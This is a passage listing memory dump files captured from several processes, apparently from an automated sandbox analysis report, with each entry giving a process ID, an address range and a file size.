  • memory/1204-59-0x0000000000000000-mapping.dmp
  • memory/1272-76-0x0000000000000000-mapping.dmp
  • memory/1272-106-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1272-84-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1300-73-0x0000000000000000-mapping.dmp
  • memory/1312-100-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1312-81-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1312-65-0x0000000000000000-mapping.dmp
  • memory/1476-86-0x0000000000000000-mapping.dmp
  • memory/1524-89-0x0000000000000000-mapping.dmp
  • memory/1620-71-0x0000000000000000-mapping.dmp
  • memory/1652-74-0x0000000000000000-mapping.dmp
  • memory/1696-62-0x0000000000000000-mapping.dmp
  • memory/1952-82-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1952-64-0x0000000000000000-mapping.dmp
  • memory/1952-121-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/2240-112-0x0000000000970000-0x0000000000A46000-memory.dmp
    Filesize

    856KB

  • memory/2240-123-0x0000000004480000-0x0000000004512000-memory.dmp
    Filesize

    584KB

  • memory/2240-103-0x0000000000000000-mapping.dmp
  • memory/2304-113-0x0000000000F70000-0x0000000001046000-memory.dmp
    Filesize

    856KB

  • memory/2304-117-0x0000000004DC0000-0x0000000004E94000-memory.dmp
    Filesize

    848KB

  • memory/2304-122-0x0000000000C30000-0x0000000000C7A000-memory.dmp
    Filesize

    296KB

  • memory/2304-108-0x0000000000000000-mapping.dmp
  • memory/2460-118-0x0000000000000000-mapping.dmp
  • memory/2568-130-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2568-137-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2568-147-0x00000000004088ED-mapping.dmp
  • memory/2568-125-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2568-124-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2580-140-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2580-142-0x00000000004088ED-mapping.dmp
  • memory/2592-151-0x00000000004088ED-mapping.dmp